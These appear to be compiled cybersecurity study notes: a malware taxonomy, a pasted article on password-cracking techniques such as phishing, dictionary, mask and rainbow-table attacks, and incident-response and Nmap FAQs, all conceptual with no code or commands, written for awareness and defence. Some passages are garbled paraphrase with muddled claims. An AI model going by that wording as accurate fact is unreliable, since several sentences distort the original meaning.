propagate; it can lurk in useful applications or replicate itself across the web . Here
are some of the most common sorts of malware:
 Macro viruses — These viruses infect applications like Microsoft Word or
Excel. Macro viruses attach to an application’s initialization sequence. When
the application is opened, the virus executes instructions before transferring
control to the application. The virus replicates itself and attaches to other
code within the computing system .
 File infectors — File infector viruses usually attach themselves to
executable code, such as .exe files. The virus is installed when the code is
loaded. Another version of a file infector associates itself with a file by
creating a virus file with an equivalent name, but an .exe extension.
Therefore, when the file is opened, the virus code will execute.
 System or boot-record infectors — A boot-record virus attaches to the
master boot record on hard disks. When the system is started, it’ll check out
the boot sector and load the virus into memory, where it can propagate to
other disks and computers.
 Polymorphic viruses — These viruses conceal themselves through varying
cycles of encryption and decryption. The encrypted virus and an associated
mutation engine are initially decrypted by a decryption program. The virus
proceeds to infect an area of code. The mutation engine then develops a new
decryption routine and therefore the virus encrypts the mutation engine and a
copy of the virus with an algorithm corresponding to the new decryption
routine. The encrypted package of mutation engine and virus is attached to
new code, and therefore the process repeats. Such viruses are difficult to
detect but have a high level of entropy due to the various modifications of
their source code. Anti-virus software or free tools like Process Hacker can
use this feature to detect them.
 Stealth viruses — Stealth viruses take over system functions to conceal
themselves. they are doing this by compromising malware detection
software in order that the software will report an infected area as being
uninfected. These viruses conceal any increase within the size of an infected
file or changes to the file’s date and time of last modification.
 Trojans — A Trojan or a trojan horse may be a program that hides during a
useful program and typically has a malicious function. a major difference
between viruses and Trojans is that Trojans don’t self-replicate. additionally
to launching attacks on a system, a Trojan can establish a back door which
will be exploited by attackers. for instance , a Trojan are often programmed
to open a high-numbered port therefore the hacker can use it to listen then
perform an attack.
 Logic bombs — A logic bomb may be a sort of malicious software that’s
appended to an application and is triggered by a selected occurrence, like a
logical condition or a specific date and time.
 Worms — Worms differ from viruses therein they are doing not attach to a
number file, but are self-contained programs that propagate across networks
and computers. Worms are commonly spread through email attachments;
opening the attachment activates the worm program. A typical worm exploit
involves the worm sending a copy of itself to each contact in an infected
computer’s email address additionally to conducting malicious activities, a
worm spreading across the internet and overloading email servers may result
in denial-of-service attacks against nodes on the network.
 Droppers — A dropper may be a program wont to install viruses on
computers. In many instances, the dropper isn’t infected with malicious code
 and, therefore won’t be detected by virus-scanning software. A dropper also
can connect to the web and download updates to virus software that’s
resident on a compromised system.
 Ransomware — Ransomware may be a sort of malware that blocks access
to the victim’s data and threatens to publish or delete it unless a ransom is
paid. While some simple computer ransomware can lock the system during a
way that’s not difficult for a knowledgeable person to reverse, more
advanced malware uses a way called cryptoviral extortion, which encrypts
the victim’s files during a way that creates them nearly impossible to recover
without the decryption key.
 Adware — Adware may be a software application used by companies for
marketing purposes; advertising banners are displayed while any program is
running. Adware are often automatically downloaded to your system while
browsing any website and may be viewed through pop-up windows or
through a bar that appears on the pc screen automatically.
 Spyware — Spyware may be a sort of program that’s installed to gather
information about users, their computers or their browsing habits. It tracks
everything you are doing without your knowledge and sends the info to a
remote user. It can also download and install other malicious programs from
the web . Spyware works like adware but is typically a separate program
that’s installed unknowingly when you install another freeware application.

The top 12 password-cracking techniques used by hackers

Some of the most common, and most effective methods for stealing passwords
by: Dale Walker

7 Sep 2021
 Shutterstock
For many years, passwords were considered to be an acceptable form of protecting
one’s privacy when it came to the digital world. However,
as cryptography and biometrics started to become more widely available to the
public, the flaws in this simple method of authentication became more noticeable. 
 The best passwords are the ones you can't remember
 If not passwords then what?
It’s worth taking into account the role of a leaked password in one of the biggest
cyber security stories of the last two years, the SolarWinds hack. It was revealed
that ‘solarwinds123’, a password created and leaked by an intern, had been
publicly accessible through a private GitHub repository since June 2018, enabling
hackers to plan and carry out the massive supply chain attack. Despite this, even if
the password hadn’t been leaked, it wouldn’t have been hard for attackers to guess
it. In the words of US politician Katie Porter, most parents utilise a stronger
password to stop their children from “watching too much YouTube on their iPad”.
studies
SIGN UP

Passwords that are weak or easy to guess are more common than you might
expect: recent findings from the NCSC found that around one in six people uses
the names of their pets as their passwords, making them highly predictable. To
make matters worse, these passwords tend to be reused across multiple sites,
with one in three people (32%) having the same password to access different
accounts.
Advertisement - Article continues below
It should come as no surprise that passwords are the worst nightmare of a cyber
security expert. To remedy this issue, there are steps worth taking, like
implementing robust multi-layer authentication. It is also worthwhile mitigating
risks to consider the steps cyber criminals must take to hack your account and
“know your enemy”. We’ve put together the top 12 password-cracking techniques
used by attackers to enable you and your business to be better prepared.

12 password-cracking techniques used by hackers:

1. Phishing
Shutterstock

Perhaps the most commonly-used hacking technique today, phishing is the practice

of attempting to steal user information by disguising malicious content as a
trustworthy communication. Although the term is generally associated with email,
and there are terms to describe other mediums - such as ‘smishing’ (SMS
phishing) - phishing can occur across any type of electronic communication.
RELATED RESOURCE

Preparing for AI-enabled cyber attacks

MIT technology review insights

DOWNLOAD NOW

The typical tactic is to trick a user into clicking on an embedded link or

downloading an attachment. Instead of being directed to a helpful resource, a
malicious file is downloaded and executed on the user’s machine. What happens
next depends entirely on the malware being executed – some may encrypt files and
prevent the user from accessing the machine, while others may attempt to stay
hidden in order to act as a backdoor for other malware.
As computer literacy has improved over the years, and as users have grown
accustomed to online threats, phishing techniques have had to become more
sophisticated. Today’s phishing usually involves some form of social engineering,
where the message will appear to have been sent from a legitimate, often well-
known company, informing their customers that they need to take action of some
kind. Netflix, Amazon, and Facebook are often used for this purpose, as it’s highly
likely that the victim will have an account associated with these brands.
Advertisement - Article continues below
The days of emails from supposed princes in Nigeria looking for an heir, or firms
acting on behalf of wealthy deceased relatives, are few and far between these days,
although you can still find the odd, wildly extravagant, claim here and there. 
Our recent favourite is the case of the first Nigerian astronaut who is unfortunately
lost in space and needs us to act as a man in the middle for a $3 million dollar
transfer to the Russian Space Agency – which apparently does return flights.
2. Social engineering

Speaking of social engineering, this typically refers to the process of tricking users
into believing the hacker is a legitimate agent. A common tactic is for hackers to
call a victim and pose as technical support, asking for things like network access
passwords in order to provide assistance. This can be just as effective if done in
person, using a fake uniform and credentials, although that’s far less common these
days.
Successful social engineering attacks can be incredibly convincing and highly
lucrative, as was the case when the CEO of a UK-based energy company lost
£201,000 to hackers after they tricked him with an AI tool that mimicked his
assistant’s voice.
3. Malware

Keyloggers, screen scrapers, and a host of other malicious tools all fall under the
umbrella of malware, malicious software designed to steal personal data.
Alongside highly disruptive malicious software like ransomware, which attempts
to block access to an entire system, there are also highly specialised malware
families that target passwords specifically.
Advertisement - Article continues below
Keyloggers, and their ilk, record a user’s activity, whether that’s through
keystrokes or screenshots, which is all then shared with a hacker. Some malware
will even proactively hunt through a user’s system for password dictionaries or
data associated with web browsers.
4. Brute force attack

Brute force attacks refer to a number of different methods of hacking that all
involve guessing passwords in order to access a system.
A simple example of a brute force attack would be a hacker simply guessing a
person’s password based on relevant clues, however, they can be more
sophisticated than that. Credential recycling, for example, relies on the fact that
many people reuse their passwords, some of which will have been exposed by
previous data breaches. Reverse brute force attacks involve hackers taking some of
the most commonly used passwords and attempting to guess associated usernames.
Most brute force attacks employ some sort of automated processing, allowing vast
quantities of passwords to be fed into a system.
5. Dictionary attack

Shutterstock

The dictionary attack is a slightly more sophisticated example of a brute force

attack.
This uses an automated process of feeding a list of commonly-used passwords and
phrases into a computer system until something fits. Most dictionaries will be
made up of credentials gained from previous hacks, although they will also contain
the most common passwords and word combinations.
Advertisement - Article continues below
This technique takes advantage of the fact that many people will use memorable
phrases as passwords, which are usually whole words stuck together. This is
largely the reason why systems will urge the use of multiple character types when
creating a password.
6. Mask attack
Where dictionary attacks use lists of all possible phrase and word combinations,
mask attacks are far more specific in their scope, often refining guesses based on
characters or numbers – usually founded in existing knowledge.
For example, if a hacker is aware that a password begins with a number, they will
be able to tailor the mask to only try those types of passwords. Password length,
the arrangement of characters, whether special characters are included, or how
many times a single character is repeated are just some of the criteria that can be
used to configure the mask.
The goal here is to drastically reduce the time it takes to crack a password, and
remove any unnecessary processing.
7. Rainbow table attack

Whenever a password is stored on a system, it’s typically encrypted using a ‘hash’,

or a cryptographic alias, making it impossible to determine the original password
without the corresponding hash. In order to bypass this, hackers maintain and
share directories that record passwords and their corresponding hashes, often
built from previous hacks, reducing the time it takes to break into a system
(used in brute force attacks).
8. Network analysers

Network analysers are tools that allow hackers to monitor and intercept data
packets sent over a network and lift the plain text passwords contained within.
Such an attack requires the use of malware or physical access to a network
switch, but it can prove highly effective. It doesn’t rely on exploiting a system
vulnerability or network bug, and as such is applicable to most internal
networks. It’s also common to use network analysers as part of the first phase of
an attack, followed up with brute force attacks.
Of course, businesses can use these same tools to scan their own networks, which
can be especially useful for running diagnostics or for troubleshooting. Using a
network analyser, admins can spot what information is being transmitted in plain
text, and put policies in place to prevent this from happening.
Advertisement - Article continues below
The only way to prevent this attack is to secure the traffic by routing it through a
VPN or something similar.
9. Spidering

Spidering refers to the process of hackers getting to know their targets intimately in
order to acquire credentials based on their activity. The process is very similar to
techniques used in phishing and social engineering attacks, but involves a far
greater amount of legwork on the part of the hacker - although it’s generally more
successful as a result.
How a hacker might use spidering will depend on the target. For example, if the
target is a large company, hackers may attempt to source internal
documentation, such as handbooks for new starters, in order to get a sense of
the sort of platforms and security the target uses. It’s in these that you often find
guides on how to access certain services, or notes on office Wi-Fi usage.
It’s often the case that companies will use passwords that relate to their
business activity or branding in some way - mainly because it makes it easier
for employees to remember. Hackers are able to exploit this by studying the
products that a business creates in order to build a hitlist of possible word
combinations, which can be used to support a brute force attack.
As is the case with many other techniques on this list, the process of spidering is
normally supported by automation.
10. Offline cracking

It’s important to remember that not all hacking takes place over an internet
connection. In fact, most of the work takes place offline, particularly as most
systems place limits on the number of guesses allowed before an account is locked.
Advertisement - Article continues below
Offline hacking usually involves the process of decrypting passwords by using a
list of hashes likely taken from a recent data breach. Without the threat of detection
or password form restrictions, hackers are able to take their time.
Of course, this can only be done once an initial attack has been successfully
launched, whether that's a hacker gaining elevated privileges and accessing a
database, by using a SQL injection attack, or by stumbling upon an unprotected
server.
11. Shoulder surfing

You might think the idea of someone looking over your shoulder to see your
password is a product of Hollywood, but this is a genuine threat, even in 2020.
Brazen examples of this include hackers disguising themselves in order to gain
access to company sites and, quite literally, look over the shoulders of employees
to grab sensitive documents and passwords. Smaller businesses are perhaps most at
risk of this, given that they’re unable to police their sites as effectively as a larger
organisation.
Security experts recently warned of a vulnerability in the authentication process
used by WhatsApp. Users trying to use WhatsApp on a new device must first enter
a unique code that's sent via a text message, which can be used to restore a user's
account and chat history from a backup. It was found that if a hacker was able to
obtain a user's phone number, they are able to download the app to a clean device
and issue a prompt for a new code, which, if they are in spying distance, they could
copy as it arrives on the user's own device.
12. Guess

If all else fails, a hacker can always try and guess your password. While there are
many password managers available that create strings that are impossible to guess,
many users still rely on memorable phrases. These are often based on hobbies,
pets, or family, much of which is often contained in the very profile pages that the
password is trying to protect.
The best way to remove this as a potential avenue for criminals is to maintain
password hygiene and make use of password managers, many of which are free.
 FORMING AN INCIDENT RESPONSE TEAM
Your IR plan should include the following sections:
 Plan overview.
 Roles and responsibilities.
 List of incidents that require action.
 Overview of the security posture and the network infrastructure.
 Procedures for detection, investigation, and containment.
 Eradication plan and capabilities.

Who makes up an incident response team?

IT, security team members and other employees with technical expertise across
company systems. The technical team will be the core of the overall incident
response team, and should include security analysts and threat intelligence

What are the five steps of incident response in order?

Five Step of Incident Response

 PREPARATION. Preparation is that the key to effective incident response. ...

 DETECTION AND REPORTING. The focus of this phase is to watch security
events so as to detect, alert, and report on potential security incidents.
 ANALYSIS. ...
 CONTAINMENT AND NEUTRALIZATION. ...
 POST-INCIDENT ACTIVITY

What does an incident response team do?

An incident response team analyzes information, discusses observations and
activities, and shares important reports and communications across the company.

What are the 4 phases of the incident management lifecycle?

 The incident response lifecycle breaks incident response down into four main
phases: Preparation; Detection and Analysis; Containment, Eradication, and
Recovery; and Post-Event Activity.

How do I report cyber attacks?

To report an Internet crime that has occurred in California, contact you local Law
Enforcement Agency; your local High Crimes Task Force; or the Attorney
General's eCrime Unit. They encourage all victims of Internet Crimes to also
contact the The Internet Crime Complaint Center (IC3).

What is incident reporting in cyber security?

Incident reporting allows an organisation to prove that they take security

seriously and demonstrate mitigative actions taken. A reporting system should
allow an organisation to take the details of a suspected breach and then output
these to generate a report if a breach notification is required

Who is responsible for reporting cyber security incident?

Security unit liaisons or their designees must report suspected serious incidents
(reported to or identified by them) within the 24 hour timeframe.
EXAMPLE:
How do I report a scammer on Facebook?
How do I report a Facebook account or Page that's pretending to be me or
someone else?
1. Go to the profile of the impersonating account. ...
2. Tap below the cover photo and select Find Support or Report Profile.
3. Follow the on-screen instructions for impersonation to file a report.
 1Reverse engineering
The process of taking a piece of software or hardware and analyzing its
functions and information flow so that its functionality and behavior can be
understood. Malware is commonly reverse-engineered in cyber defense.

Why is reverse engineering important in cyber security?

In software testing, reverse engineering aids testers' understanding of viral and
other malware code. In software security, reverse engineering is widely used to
ensure that the system lacks any major security flaws or vulnerability. It helps
to make a system robust, thereby protecting it from hackers and spyware.
What is reverse engineering?

Reverse engineering (also known as backwards engineering or back

engineering) is a process or method through which one attempts to
understand through deductive reasoning how a previously made device,
process, system, or piece of software accomplishes a task with very little
(if any) insight into exactly how it does so

What is Nmap in cyber security?

Nmap stands for Network Mapper is a free Open source command-line
tool. Nmap is an information-gathering tool used for recon reconnaissance.
Basically, it scans hosts and services on a computer network means it sends
packets and analyzes the response

ZENMAP:
 Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform
(Linux, Windows, Mac OS X, BSD, etc.) free and open source application
which aims to make Nmap easy for beginners to use while providing
advanced features for experienced Nmap users.

PORT SCANNER in cyber security

A port scan is a method for determining which ports on a network are
open. As ports on a computer are the place where information is sent and
received, port scanning is analogous to knocking on doors to see if someone
is home. ... It is also valuable for testing network security and the strength of
the system's firewall.

How Does a Port Scanner Operate?

A port scanner sends a network request to connect to a specific TCP or
UDP port on a computer and records the response. ... If you wanted to
check to see if your web server was operating correctly, you would check
the status of port 80 on that server to make sure it was open and listening

BREACHES IN CYBER SECURITY

A security breach is any incident that results in unauthorized access to

computer data, applications, networks or devices. It results in information being
accessed without authorization. ... A security breach is effectively a break-in,
whereas a data breach is defined as the cybercriminal getting away with
information.

What breach means?

1 : infraction or violation of a law, obligation, tie, or standard a breach of trust
sued them for breach of contract. 2a : a broken, ruptured, or torn condition or area
a breach of the skin the leak was a major security breach.
What is security compromise?
The unauthorized disclosure, modification, substitution, or use of sensitive data
(e.g., keys, metadata, or other security-related information) or the unauthorized
modification of a security-related system, device or process in order to gain
unauthorized access.

What are examples of breaches?

Breach is defined as break or violate. An example of breach is breaking a hole in
the sea wall. An example of breach is breaking a contract. A violation or
infraction, as of a contract, law, legal obligation, or promise.

How do security breaches happen?

This can be done by accessing a computer or network to steal local files or by
bypassing network security remotely. While most data breaches are attributed to
hacking or malware attacks, other breach methods include insider leaks, payment
card fraud, loss or theft of a physical hard drive of files and human error.

What are the three types of security?

There are three primary areas or classifications of security controls. These

include management security, operational security, and physical security
controls.

What are the types of security breaches?

 MAN-IN-THE-MIDDLE ATTACK. ...
 DENIAL-OF-SERVICE AND DISTRIBUTED-DENIAL-OF-SERVICE
ATTACKS. ...
 PHISHING AND SPEAR PHISHING. ...
 PASSWORD ATTACK. ...
 EAVESDROP ATTACK. ...
 CROSS-SITE SCRIPTING ATTACK. ...
 MALWARE ATTACK

Most often, cyber attacks happen because criminals want your:

 business' financial details.
 customers' financial details (eg credit card data)
 sensitive personal data.
 customers' or staff email addresses and login credentials.
 customer databases.
 clients lists.
 IT infrastructure.